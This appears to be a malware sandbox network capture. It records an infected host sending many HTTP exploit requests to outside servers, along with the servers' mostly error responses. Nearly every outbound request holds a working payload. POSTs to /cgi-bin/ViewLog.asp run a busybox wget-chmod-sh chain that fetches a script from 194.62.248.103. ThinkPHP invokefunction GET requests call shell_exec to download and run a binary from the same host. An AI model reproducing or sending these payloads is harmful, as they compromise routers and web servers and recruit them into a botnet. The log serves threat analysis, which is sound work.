                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.234524494.122.77.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.364731073 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.235060495.101.88.3380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.464750051 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.724680901 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 31 64 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 33 66 34 32 33 61 37 64 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 62 31 64 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 37 26 23 34 36 3b 33 66 34 32 33 61 37 64 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b1dd517&#46;1713105347&#46;3f423a7d<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;b1dd517&#46;1713105347&#46;3f423a7d</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.234413095.216.203.18780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.548249960 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.869021893 CEST309INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Sun, 14 Apr 2024 14:35:06 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.233874295.217.73.21180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.556386948 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.876667976 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.233447295.170.155.16680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:47.843867064 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:48.221868992 CEST335INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.8.0
                                                        Date: Sun, 14 Apr 2024 14:35:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.235820885.31.239.748080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:48.308549881 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:48.601686954 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.233786495.154.146.20780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:50.565717936 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:50.900285006 CEST260INHTTP/1.0 404 Not Found
                                                        Server: httpd
                                                        Date: Sun, 14 Apr 2024 14:31:41 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.234679885.240.189.498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:50.960704088 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.574392080 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.236022685.163.168.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:50.960777044 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.606301069 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.923264980 CEST356INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.2
                                                        Date: Sun, 14 Apr 2024 14:35:52 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 84(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!+Y2T@?0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.233610494.122.63.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:50.975985050 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.234436295.151.242.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:50.998480082 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:51.411535025 CEST217INHTTP/1.1 401 Unauthorized
                                                        WWW-Authenticate: Basic realm="WEB Remote Viewer", charset="UTF-8"
                                                        Content-Type: text/html
                                                        Content-Length: 347
                                                        Date: Sun, 14 Apr 2024 14:35:49 GMT
                                                        Server: lighttpd/1.4.52


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.233786695.154.146.20780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:51.216072083 CEST268INHTTP/1.0 400 Bad Request
                                                        Server: httpd
                                                        Date: Sun, 14 Apr 2024 14:31:42 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.234428894.122.5.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:51.318720102 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.233673294.46.247.1388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:51.614459038 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:51.909835100 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:51 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3454
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d
                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png') no-


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.233858631.136.158.808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:51.632843018 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.606400967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
